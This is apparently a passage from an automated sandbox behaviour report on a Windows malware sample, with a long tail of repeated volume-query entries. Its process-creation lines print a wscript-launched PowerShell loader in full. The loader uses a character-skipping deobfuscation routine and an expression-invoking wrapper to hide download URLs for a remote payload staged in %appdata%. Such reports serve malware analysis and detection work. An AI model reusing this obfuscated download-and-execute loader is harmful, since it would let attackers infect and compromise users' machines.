F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
